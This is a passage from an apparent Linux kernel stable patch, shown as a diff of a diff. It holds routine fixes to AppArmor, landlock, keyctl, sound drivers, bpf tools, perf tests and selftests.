+ 		result = rates_160M[rate->he_gi];
+ 	else if (rate->bw == RATE_INFO_BW_80 ||
+ 		 (rate->bw == RATE_INFO_BW_HE_RU &&
+ 		  rate->he_ru_alloc == NL80211_RATE_INFO_HE_RU_ALLOC_996))
+-		result = rates_969[rate->he_gi];
++		result = rates_996[rate->he_gi];
+ 	else if (rate->bw == RATE_INFO_BW_40 ||
+ 		 (rate->bw == RATE_INFO_BW_HE_RU &&
+ 		  rate->he_ru_alloc == NL80211_RATE_INFO_HE_RU_ALLOC_484))
+diff --git a/scripts/Makefile.lib b/scripts/Makefile.lib
+index 3aa384cec76b8..d236e5658f9b1 100644
+--- a/scripts/Makefile.lib
++++ b/scripts/Makefile.lib
+@@ -382,8 +382,12 @@ cmd_dtc = $(HOSTCC) -E $(dtc_cpp_flags) -x assembler-with-cpp -o $(dtc-tmp) $< ;
+ 		-d $(depfile).dtc.tmp $(dtc-tmp) ; \
+ 	cat $(depfile).pre.tmp $(depfile).dtc.tmp > $(depfile)
+ 
++# NOTE:
++# Do not replace $(filter %.dtb %.dtbo, $^) with $(real-prereqs). When a single
++# DTB is turned into a multi-blob DTB, $^ will contain header file dependencies
++# recorded in the .*.cmd file.
+ quiet_cmd_fdtoverlay = DTOVL   $@
+-      cmd_fdtoverlay = $(objtree)/scripts/dtc/fdtoverlay -o $@ -i $(real-prereqs)
++      cmd_fdtoverlay = $(objtree)/scripts/dtc/fdtoverlay -o $@ -i $(filter %.dtb %.dtbo, $^)
+ 
+ $(multi-dtb-y): FORCE
+ 	$(call if_changed,fdtoverlay)
+diff --git a/scripts/gcc-x86_32-has-stack-protector.sh b/scripts/gcc-x86_32-has-stack-protector.sh
+index 825c75c5b7150..9459ca4f0f11f 100755
+--- a/scripts/gcc-x86_32-has-stack-protector.sh
++++ b/scripts/gcc-x86_32-has-stack-protector.sh
+@@ -5,4 +5,4 @@
+ # -mstack-protector-guard-reg, added by
+ # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=81708
+ 
+-echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -c -m32 -O0 -fstack-protector -mstack-protector-guard-reg=fs -mstack-protector-guard-symbol=__stack_chk_guard - -o - 2> /dev/null | grep -q "%fs"
++echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -m32 -O0 -fstack-protector -mstack-protector-guard-reg=fs -mstack-protector-guard-symbol=__stack_chk_guard - -o - 2> /dev/null | grep -q "%fs"
+diff --git a/scripts/gcc-x86_64-has-stack-protector.sh b/scripts/gcc-x86_64-has-stack-protector.sh
+index 75e4e22b986ad..f680bb01aeeb3 100755
+--- a/scripts/gcc-x86_64-has-stack-protector.sh
++++ b/scripts/gcc-x86_64-has-stack-protector.sh
+@@ -1,4 +1,4 @@
+ #!/bin/sh
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -c -m64 -O0 -mcmodel=kernel -fno-PIE -fstack-protector - -o - 2> /dev/null | grep -q "%gs"
++echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -m64 -O0 -mcmodel=kernel -fno-PIE -fstack-protector - -o - 2> /dev/null | grep -q "%gs"
+diff --git a/security/apparmor/lsm.c b/security/apparmor/lsm.c
+index 1e2f40db15c58..97389b9c41290 100644
+--- a/security/apparmor/lsm.c
++++ b/security/apparmor/lsm.c
+@@ -1081,6 +1081,13 @@ static int apparmor_socket_sock_rcv_skb(struct sock *sk, struct sk_buff *skb)
+ 	if (!skb->secmark)
+ 		return 0;
+ 
++	/*
++	 * If reach here before socket_post_create hook is called, in which
++	 * case label is null, drop the packet.
++	 */
++	if (!ctx->label)
++		return -EACCES;
++
+ 	return apparmor_secmark_check(ctx->label, OP_RECVMSG, AA_MAY_RECEIVE,
+ 				      skb->secmark, sk);
+ }
+diff --git a/security/apparmor/policy.c b/security/apparmor/policy.c
+index c7b84fb568414..4ee5a450d1187 100644
+--- a/security/apparmor/policy.c
++++ b/security/apparmor/policy.c
+@@ -187,7 +187,7 @@ static void aa_free_data(void *ptr, void *arg)
+ {
+ 	struct aa_data *data = ptr;
+ 
+-	kfree_sensitive(data->data);
++	kvfree_sensitive(data->data, data->size);
+ 	kfree_sensitive(data->key);
+ 	kfree_sensitive(data);
+ }
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 633e778ec3692..17601235ff982 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -898,6 +898,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 
+ 			if (rhashtable_insert_fast(profile->data, &data->head,
+ 						   profile->data->p)) {
++				kvfree_sensitive(data->data, data->size);
+ 				kfree_sensitive(data->key);
+ 				kfree_sensitive(data);
+ 				info = "failed to insert data to table";
+diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
+index 19be69fa4d052..aa1dc43b16ddf 100644
+--- a/security/keys/keyctl.c
++++ b/security/keys/keyctl.c
+@@ -1694,7 +1694,7 @@ long keyctl_session_to_parent(void)
+ 		goto unlock;
+ 
+ 	/* cancel an already pending keyring replacement */
+-	oldwork = task_work_cancel(parent, key_change_session_keyring);
++	oldwork = task_work_cancel_func(parent, key_change_session_keyring);
+ 
+ 	/* the replacement session keyring is applied just prior to userspace
+ 	 * restarting */
+diff --git a/security/landlock/cred.c b/security/landlock/cred.c
+index ec6c37f04a191..e215607fd46c7 100644
+--- a/security/landlock/cred.c
++++ b/security/landlock/cred.c
+@@ -14,8 +14,8 @@
+ #include "ruleset.h"
+ #include "setup.h"
+ 
+-static int hook_cred_prepare(struct cred *const new,
+-			     const struct cred *const old, const gfp_t gfp)
++static void hook_cred_transfer(struct cred *const new,
++			       const struct cred *const old)
+ {
+ 	struct landlock_ruleset *const old_dom = landlock_cred(old)->domain;
+ 
+@@ -23,6 +23,12 @@ static int hook_cred_prepare(struct cred *const new,
+ 		landlock_get_ruleset(old_dom);
+ 		landlock_cred(new)->domain = old_dom;
+ 	}
++}
++
++static int hook_cred_prepare(struct cred *const new,
++			     const struct cred *const old, const gfp_t gfp)
++{
++	hook_cred_transfer(new, old);
+ 	return 0;
+ }
+ 
+@@ -36,6 +42,7 @@ static void hook_cred_free(struct cred *const cred)
+ 
+ static struct security_hook_list landlock_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(cred_prepare, hook_cred_prepare),
++	LSM_HOOK_INIT(cred_transfer, hook_cred_transfer),
+ 	LSM_HOOK_INIT(cred_free, hook_cred_free),
+ };
+ 
+diff --git a/sound/soc/amd/acp-es8336.c b/sound/soc/amd/acp-es8336.c
+index 89499542c803f..f91a3c13ac235 100644
+--- a/sound/soc/amd/acp-es8336.c
++++ b/sound/soc/amd/acp-es8336.c
+@@ -203,8 +203,10 @@ static int st_es8336_late_probe(struct snd_soc_card *card)
+ 
+ 	codec_dev = acpi_get_first_physical_node(adev);
+ 	acpi_dev_put(adev);
+-	if (!codec_dev)
++	if (!codec_dev) {
+ 		dev_err(card->dev, "can not find codec dev\n");
++		return -ENODEV;
++	}
+ 
+ 	ret = devm_acpi_dev_add_driver_gpios(codec_dev, acpi_es8336_gpios);
+ 	if (ret)
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 8e3eccb4faa72..c438fccac8e98 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -220,6 +220,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21J6"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21M5"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/max98088.c b/sound/soc/codecs/max98088.c
+index 405ec16be2b6a..eaabfe2cfd70d 100644
+--- a/sound/soc/codecs/max98088.c
++++ b/sound/soc/codecs/max98088.c
+@@ -1318,6 +1318,7 @@ static int max98088_set_bias_level(struct snd_soc_component *component,
+                                   enum snd_soc_bias_level level)
+ {
+ 	struct max98088_priv *max98088 = snd_soc_component_get_drvdata(component);
++	int ret;
+ 
+ 	switch (level) {
+ 	case SND_SOC_BIAS_ON:
+@@ -1333,10 +1334,13 @@ static int max98088_set_bias_level(struct snd_soc_component *component,
+ 		 */
+ 		if (!IS_ERR(max98088->mclk)) {
+ 			if (snd_soc_component_get_bias_level(component) ==
+-			    SND_SOC_BIAS_ON)
++			    SND_SOC_BIAS_ON) {
+ 				clk_disable_unprepare(max98088->mclk);
+-			else
+-				clk_prepare_enable(max98088->mclk);
++			} else {
++				ret = clk_prepare_enable(max98088->mclk);
++				if (ret)
++					return ret;
++			}
+ 		}
+ 		break;
+ 
+diff --git a/sound/soc/intel/common/soc-intel-quirks.h b/sound/soc/intel/common/soc-intel-quirks.h
+index de4e550c5b34d..42bd51456b945 100644
+--- a/sound/soc/intel/common/soc-intel-quirks.h
++++ b/sound/soc/intel/common/soc-intel-quirks.h
+@@ -11,7 +11,7 @@
+ 
+ #include <linux/platform_data/x86/soc.h>
+ 
+-#if IS_ENABLED(CONFIG_X86)
++#if IS_REACHABLE(CONFIG_IOSF_MBI)
+ 
+ #include <linux/dmi.h>
+ #include <asm/iosf_mbi.h>
+diff --git a/sound/soc/qcom/lpass-cpu.c b/sound/soc/qcom/lpass-cpu.c
+index dbdaaa85ce481..4387cca893c5d 100644
+--- a/sound/soc/qcom/lpass-cpu.c
++++ b/sound/soc/qcom/lpass-cpu.c
+@@ -1160,9 +1160,13 @@ int asoc_qcom_lpass_cpu_platform_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "lpass-rxtx-cdc-dma-lpm");
++		if (!res)
++			return -EINVAL;
+ 		drvdata->rxtx_cdc_dma_lpm_buf = res->start;
+ 
+ 		res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "lpass-va-cdc-dma-lpm");
++		if (!res)
++			return -EINVAL;
+ 		drvdata->va_cdc_dma_lpm_buf = res->start;
+ 	}
+ 
+diff --git a/sound/soc/sof/imx/imx8m.c b/sound/soc/sof/imx/imx8m.c
+index 1243f8a6141ea..186ba4bbb5b26 100644
+--- a/sound/soc/sof/imx/imx8m.c
++++ b/sound/soc/sof/imx/imx8m.c
+@@ -243,7 +243,7 @@ static int imx8m_probe(struct snd_sof_dev *sdev)
+ 	/* set default mailbox offset for FW ready message */
+ 	sdev->dsp_box.offset = MBOX_OFFSET;
+ 
+-	priv->regmap = syscon_regmap_lookup_by_compatible("fsl,dsp-ctrl");
++	priv->regmap = syscon_regmap_lookup_by_phandle(np, "fsl,dsp-ctrl");
+ 	if (IS_ERR(priv->regmap)) {
+ 		dev_err(sdev->dev, "cannot find dsp-ctrl registers");
+ 		ret = PTR_ERR(priv->regmap);
+diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
+index 783a2493707ea..5699a62d17679 100644
+--- a/sound/usb/mixer.c
++++ b/sound/usb/mixer.c
+@@ -1211,6 +1211,13 @@ static void volume_control_quirks(struct usb_mixer_elem_info *cval,
+ 			cval->res = 16;
+ 		}
+ 		break;
++	case USB_ID(0x1bcf, 0x2281): /* HD Webcam */
++		if (!strcmp(kctl->id.name, "Mic Capture Volume")) {
++			usb_audio_info(chip,
++				"set resolution quirk: cval->res = 16\n");
++			cval->res = 16;
++		}
++		break;
+ 	}
+ }
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index b8a474a2e4d59..733a25275fe9f 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2083,6 +2083,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x0b0e, 0x0349, /* Jabra 550a */
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
++	DEVICE_FLG(0x0c45, 0x6340, /* Sonix HD USB Camera */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
+ 		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+@@ -2125,6 +2127,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x19f7, 0x0035, /* RODE NT-USB+ */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x1bcf, 0x2281, /* HD Webcam */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x2040, 0x7200, /* Hauppauge HVR-950Q */
+diff --git a/tools/bpf/bpftool/common.c b/tools/bpf/bpftool/common.c
+index e7a11cff7245a..db02b000fbebd 100644
+--- a/tools/bpf/bpftool/common.c
++++ b/tools/bpf/bpftool/common.c
+@@ -333,7 +333,7 @@ void get_prog_full_name(const struct bpf_prog_info *prog_info, int prog_fd,
+ {
+ 	const char *prog_name = prog_info->name;
+ 	const struct btf_type *func_type;
+-	const struct bpf_func_info finfo = {};
++	struct bpf_func_info finfo = {};
+ 	struct bpf_prog_info info = {};
+ 	__u32 info_len = sizeof(info);
+ 	struct btf *prog_btf = NULL;
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index 7e0b846e17eef..21817eb510396 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -1707,6 +1707,10 @@ static int load_with_options(int argc, char **argv, bool first_prog_only)
+ 	}
+ 
+ 	if (pinmaps) {
++		err = create_and_mount_bpffs_dir(pinmaps);
++		if (err)
++			goto err_unpin;
++
+ 		err = bpf_object__pin_maps(obj, pinmaps);
+ 		if (err) {
+ 			p_err("failed to pin all maps");
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index 82bffa7cf8659..7775040182e39 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -696,7 +696,7 @@ static int sets_patch(struct object *obj)
+ 			 * Make sure id is at the beginning of the pairs
+ 			 * struct, otherwise the below qsort would not work.
+ 			 */
+-			BUILD_BUG_ON(set8->pairs != &set8->pairs[0].id);
++			BUILD_BUG_ON((u32 *)set8->pairs != &set8->pairs[0].id);
+ 			qsort(set8->pairs, set8->cnt, sizeof(set8->pairs[0]), cmp_id);
+ 
+ 			/*
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 713264899250a..cfdee656789b2 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1521,10 +1521,12 @@ static void btf_dump_emit_type_chain(struct btf_dump *d,
+ 			 * Clang for BPF target generates func_proto with no
+ 			 * args as a func_proto with a single void arg (e.g.,
+ 			 * `int (*f)(void)` vs just `int (*f)()`). We are
+-			 * going to pretend there are no args for such case.
++			 * going to emit valid empty args (void) syntax for
++			 * such case. Similarly and conveniently, valid
++			 * no args case can be special-cased here as well.
+ 			 */
+-			if (vlen == 1 && p->type == 0) {
+-				btf_dump_printf(d, ")");
++			if (vlen == 0 || (vlen == 1 && p->type == 0)) {
++				btf_dump_printf(d, "void)");
+ 				return;
+ 			}
+ 
+diff --git a/tools/lib/bpf/linker.c b/tools/lib/bpf/linker.c
+index 4ac02c28e152a..8a7cb830bff14 100644
+--- a/tools/lib/bpf/linker.c
++++ b/tools/lib/bpf/linker.c
+@@ -2189,10 +2189,17 @@ static int linker_fixup_btf(struct src_obj *obj)
+ 		vi = btf_var_secinfos(t);
+ 		for (j = 0, m = btf_vlen(t); j < m; j++, vi++) {
+ 			const struct btf_type *vt = btf__type_by_id(obj->btf, vi->type);
+-			const char *var_name = btf__str_by_offset(obj->btf, vt->name_off);
+-			int var_linkage = btf_var(vt)->linkage;
++			const char *var_name;
++			int var_linkage;
+ 			Elf64_Sym *sym;
+ 
++			/* could be a variable or function */
++			if (!btf_is_var(vt))
++				continue;
++
++			var_name = btf__str_by_offset(obj->btf, vt->name_off);
++			var_linkage = btf_var(vt)->linkage;
++
+ 			/* no need to patch up static or extern vars */
+ 			if (var_linkage != BTF_VAR_GLOBAL_ALLOCATED)
+ 				continue;
+diff --git a/tools/memory-model/lock.cat b/tools/memory-model/lock.cat
+index 6b52f365d73ac..9f3b5b38221bf 100644
+--- a/tools/memory-model/lock.cat
++++ b/tools/memory-model/lock.cat
+@@ -102,19 +102,19 @@ let rf-lf = rfe-lf | rfi-lf
+  * within one of the lock's critical sections returns False.
+  *)
+ 
+-(* rfi for RU events: an RU may read from the last po-previous UL *)
+-let rfi-ru = ([UL] ; po-loc ; [RU]) \ ([UL] ; po-loc ; [LKW] ; po-loc)
+-
+-(* rfe for RU events: an RU may read from an external UL or the initial write *)
+-let all-possible-rfe-ru =
+-	let possible-rfe-ru r =
++(*
++ * rf for RU events: an RU may read from an external UL or the initial write,
++ * or from the last po-previous UL
++ *)
++let all-possible-rf-ru =
++	let possible-rf-ru r =
+ 		let pair-to-relation p = p ++ 0
+-		in map pair-to-relation (((UL | IW) * {r}) & loc & ext)
+-	in map possible-rfe-ru RU
++		in map pair-to-relation ((((UL | IW) * {r}) & loc & ext) |
++			(((UL * {r}) & po-loc) \ ([UL] ; po-loc ; [LKW] ; po-loc)))
++	in map possible-rf-ru RU
+ 
+ (* Generate all rf relations for RU events *)
+-with rfe-ru from cross(all-possible-rfe-ru)
+-let rf-ru = rfe-ru | rfi-ru
++with rf-ru from cross(all-possible-rf-ru)
+ 
+ (* Final rf relation *)
+ let rf = rf | rf-lf | rf-ru
+diff --git a/tools/perf/arch/x86/util/intel-pt.c b/tools/perf/arch/x86/util/intel-pt.c
+index af102f471e9f4..9daec588103bc 100644
+--- a/tools/perf/arch/x86/util/intel-pt.c
++++ b/tools/perf/arch/x86/util/intel-pt.c
+@@ -32,6 +32,7 @@
+ #include "../../../util/tsc.h"
+ #include <internal/lib.h> // page_size
+ #include "../../../util/intel-pt.h"
++#include <api/fs/fs.h>
+ 
+ #define KiB(x) ((x) * 1024)
+ #define MiB(x) ((x) * 1024 * 1024)
+@@ -440,6 +441,16 @@ static int intel_pt_track_switches(struct evlist *evlist)
+ 	return 0;
+ }
+ 
++static bool intel_pt_exclude_guest(void)
++{
++	int pt_mode;
++
++	if (sysfs__read_int("module/kvm_intel/parameters/pt_mode", &pt_mode))
++		pt_mode = 0;
++
++	return pt_mode == 1;
++}
++
+ static void intel_pt_valid_str(char *str, size_t len, u64 valid)
+ {
+ 	unsigned int val, last = 0, state = 1;
+@@ -643,6 +654,7 @@ static int intel_pt_recording_options(struct auxtrace_record *itr,
+ 			}
+ 			evsel->core.attr.freq = 0;
+ 			evsel->core.attr.sample_period = 1;
++			evsel->core.attr.exclude_guest = intel_pt_exclude_guest();
+ 			evsel->no_aux_samples = true;
+ 			evsel->needs_auxtrace_mmap = true;
+ 			intel_pt_evsel = evsel;
+@@ -780,7 +792,8 @@ static int intel_pt_recording_options(struct auxtrace_record *itr,
+ 	}
+ 
+ 	if (!opts->auxtrace_snapshot_mode && !opts->auxtrace_sample_mode) {
+-		u32 aux_watermark = opts->auxtrace_mmap_pages * page_size / 4;
++		size_t aw = opts->auxtrace_mmap_pages * (size_t)page_size / 4;
++		u32 aux_watermark = aw > UINT_MAX ? UINT_MAX : aw;
+ 
+ 		intel_pt_evsel->core.attr.aux_watermark = aux_watermark;
+ 	}
+diff --git a/tools/perf/tests/shell/test_arm_callgraph_fp.sh b/tools/perf/tests/shell/test_arm_callgraph_fp.sh
+index ec108d45d3c61..60cd35c73e47d 100755
+--- a/tools/perf/tests/shell/test_arm_callgraph_fp.sh
++++ b/tools/perf/tests/shell/test_arm_callgraph_fp.sh
+@@ -4,65 +4,31 @@
+ 
+ lscpu | grep -q "aarch64" || exit 2
+ 
+-if ! [ -x "$(command -v cc)" ]; then
+-	echo "failed: no compiler, install gcc"
+-	exit 2
+-fi
+-
+ PERF_DATA=$(mktemp /tmp/__perf_test.perf.data.XXXXX)
+-TEST_PROGRAM_SOURCE=$(mktemp /tmp/test_program.XXXXX.c)
+-TEST_PROGRAM=$(mktemp /tmp/test_program.XXXXX)
++TEST_PROGRAM="perf test -w leafloop"
+ 
+ cleanup_files()
+ {
+-	rm -f $PERF_DATA
+-	rm -f $TEST_PROGRAM_SOURCE
+-	rm -f $TEST_PROGRAM
+-}
+-
+-trap cleanup_files exit term int
+-
+-cat << EOF > $TEST_PROGRAM_SOURCE
+-int a = 0;
+-void leaf(void) {
+-  for (;;)
+-    a += a;
++	rm -f "$PERF_DATA"
+ }
+-void parent(void) {
+-  leaf();
+-}
+-int main(void) {
+-  parent();
+-  return 0;
+-}
+-EOF
+-
+-echo " + Compiling test program ($TEST_PROGRAM)..."
+-
+-CFLAGS="-g -O0 -fno-inline -fno-omit-frame-pointer"
+-cc $CFLAGS $TEST_PROGRAM_SOURCE -o $TEST_PROGRAM || exit 1
+ 
+-# Add a 1 second delay to skip samples that are not in the leaf() function
+-perf record -o $PERF_DATA --call-graph fp -e cycles//u -D 1000 --user-callchains -- $TEST_PROGRAM 2> /dev/null &
+-PID=$!
++trap cleanup_files EXIT TERM INT
+ 
+-echo " + Recording (PID=$PID)..."
+-sleep 2
+-echo " + Stopping perf-record..."
++# shellcheck disable=SC2086
++perf record -o "$PERF_DATA" --call-graph fp -e cycles//u --user-callchains -- $TEST_PROGRAM
+ 
+-kill $PID
+-wait $PID
++# Try opening the file so any immediate errors are visible in the log
++perf script -i "$PERF_DATA" -F comm,ip,sym | head -n4
+ 
+-# expected perf-script output:
++# expected perf-script output if 'leaf' has been inserted correctly:
+ #
+-# program
++# perf
+ # 	728 leaf
+ # 	753 parent
+-# 	76c main
+-# ...
++# 	76c leafloop
++# ... remaining stack to main() ...
+ 
+-perf script -i $PERF_DATA -F comm,ip,sym | head -n4
+-perf script -i $PERF_DATA -F comm,ip,sym | head -n4 | \
+-	awk '{ if ($2 != "") sym[i++] = $2 } END { if (sym[0] != "leaf" ||
+-						       sym[1] != "parent" ||
+-						       sym[2] != "main") exit 1 }'
++# Each frame is separated by a tab, some spaces and an address
++SEP="[[:space:]]+ [[:xdigit:]]+"
++perf script -i "$PERF_DATA" -F comm,ip,sym | tr '\n' ' ' | \
++	grep -E -q "perf $SEP leaf $SEP parent $SEP leafloop"
+diff --git a/tools/perf/tests/workloads/leafloop.c b/tools/perf/tests/workloads/leafloop.c
+index 1bf5cc97649b0..f7561767e32cd 100644
+--- a/tools/perf/tests/workloads/leafloop.c
++++ b/tools/perf/tests/workloads/leafloop.c
+@@ -1,6 +1,8 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
++#include <signal.h>
+ #include <stdlib.h>
+ #include <linux/compiler.h>
++#include <unistd.h>
+ #include "../tests.h"
+ 
+ /* We want to check these symbols in perf script */
+@@ -8,10 +10,16 @@ noinline void leaf(volatile int b);
+ noinline void parent(volatile int b);
+ 
+ static volatile int a;
++static volatile sig_atomic_t done;
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
+ 
+ noinline void leaf(volatile int b)
+ {
+-	for (;;)
++	while (!done)
+ 		a += b;
+ }
+ 
+@@ -22,12 +30,16 @@ noinline void parent(volatile int b)
+ 
+ static int leafloop(int argc, const char **argv)
+ {
+-	int c = 1;
++	int sec = 1;
+ 
+ 	if (argc > 0)
+-		c = atoi(argv[0]);
++		sec = atoi(argv[0]);
++
++	signal(SIGINT, sighandler);
++	signal(SIGALRM, sighandler);
++	alarm(sec);
+ 
+-	parent(c);
++	parent(sec);
+ 	return 0;
+ }
+ 
+diff --git a/tools/perf/util/sort.c b/tools/perf/util/sort.c
+index 6882b17144994..1821c81892df5 100644
+--- a/tools/perf/util/sort.c
++++ b/tools/perf/util/sort.c
+@@ -275,7 +275,7 @@ sort__sym_cmp(struct hist_entry *left, struct hist_entry *right)
+ 	 * comparing symbol address alone is not enough since it's a
+ 	 * relative address within a dso.
+ 	 */
+-	if (!hists__has(left->hists, dso) || hists__has(right->hists, dso)) {
++	if (!hists__has(left->hists, dso)) {
+ 		ret = sort__dso_cmp(left, right);
+ 		if (ret != 0)
+ 			return ret;
+diff --git a/tools/testing/selftests/bpf/prog_tests/sk_lookup.c b/tools/testing/selftests/bpf/prog_tests/sk_lookup.c
+index 597d0467a9267..de2466547efe0 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sk_lookup.c
++++ b/tools/testing/selftests/bpf/prog_tests/sk_lookup.c
+@@ -994,7 +994,7 @@ static void drop_on_reuseport(const struct test *t)
+ 
+ 	err = update_lookup_map(t->sock_map, SERVER_A, server1);
+ 	if (err)
+-		goto detach;
++		goto close_srv1;
+ 
+ 	/* second server on destination address we should never reach */
+ 	server2 = make_server(t->sotype, t->connect_to.ip, t->connect_to.port,
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+index 39973ea1ce433..89366913a251c 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+@@ -217,7 +217,7 @@ static void test_xdp_adjust_frags_tail_grow(void)
+ 
+ 	prog = bpf_object__next_program(obj, NULL);
+ 	if (bpf_object__load(obj))
+-		return;
++		goto out;
+ 
+ 	prog_fd = bpf_program__fd(prog);
+ 
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c
+index ba97165bdb282..a657651eba523 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c
+@@ -14,9 +14,9 @@ typedef int *ptr_arr_t[6];
+ 
+ typedef int *ptr_multiarr_t[7][8][9][10];
+ 
+-typedef int * (*fn_ptr_arr_t[11])();
++typedef int * (*fn_ptr_arr_t[11])(void);
+ 
+-typedef int * (*fn_ptr_multiarr_t[12][13])();
++typedef int * (*fn_ptr_multiarr_t[12][13])(void);
+ 
+ struct root_struct {
+ 	arr_t _1;
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c
+index 4ee4748133fec..9355e323d40cf 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c
+@@ -67,7 +67,7 @@ typedef void (*printf_fn_t)(const char *, ...);
+  *   `int -> char *` function and returns pointer to a char. Equivalent:
+  *   typedef char * (*fn_input_t)(int);
+  *   typedef char * (*fn_output_outer_t)(fn_input_t);
+- *   typedef const fn_output_outer_t (* fn_output_inner_t)();
++ *   typedef const fn_output_outer_t (* fn_output_inner_t)(void);
+  *   typedef const fn_output_inner_t fn_ptr_arr2_t[5];
+  */
+ /* ----- START-EXPECTED-OUTPUT ----- */
+@@ -94,7 +94,7 @@ typedef void (* (*signal_t)(int, void (*)(int)))(int);
+ 
+ typedef char * (*fn_ptr_arr1_t[10])(int **);
+ 
+-typedef char * (* (* const fn_ptr_arr2_t[5])())(char * (*)(int));
++typedef char * (* (* const fn_ptr_arr2_t[5])(void))(char * (*)(int));
+ 
+ struct struct_w_typedefs {
+ 	int_t a;
+diff --git a/tools/testing/selftests/bpf/test_sockmap.c b/tools/testing/selftests/bpf/test_sockmap.c
+index d56f521b8aaa2..25da05cad8f61 100644
+--- a/tools/testing/selftests/bpf/test_sockmap.c
++++ b/tools/testing/selftests/bpf/test_sockmap.c
+@@ -63,7 +63,7 @@ int passed;
+ int failed;
+ int map_fd[9];
+ struct bpf_map *maps[9];
+-int prog_fd[11];
++int prog_fd[9];
+ 
+ int txmsg_pass;
+ int txmsg_redir;
+@@ -680,7 +680,8 @@ static int msg_loop(int fd, int iov_count, int iov_length, int cnt,
+ 				}
+ 			}
+ 
+-			s->bytes_recvd += recv;
++			if (recv > 0)
++				s->bytes_recvd += recv;
+ 
+ 			if (opt->check_recved_len && s->bytes_recvd > total_bytes) {
+ 				errno = EMSGSIZE;
+@@ -1775,8 +1776,6 @@ int prog_attach_type[] = {
+ 	BPF_SK_MSG_VERDICT,
+ 	BPF_SK_MSG_VERDICT,
+ 	BPF_SK_MSG_VERDICT,
+-	BPF_SK_MSG_VERDICT,
+-	BPF_SK_MSG_VERDICT,
+ };
+ 
+ int prog_type[] = {
+@@ -1789,8 +1788,6 @@ int prog_type[] = {
+ 	BPF_PROG_TYPE_SK_MSG,
+ 	BPF_PROG_TYPE_SK_MSG,
+ 	BPF_PROG_TYPE_SK_MSG,
+-	BPF_PROG_TYPE_SK_MSG,
+-	BPF_PROG_TYPE_SK_MSG,
+ };
+ 
+ static int populate_progs(char *bpf_file)
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+index 616d3581419ca..21d0f419cc6d7 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
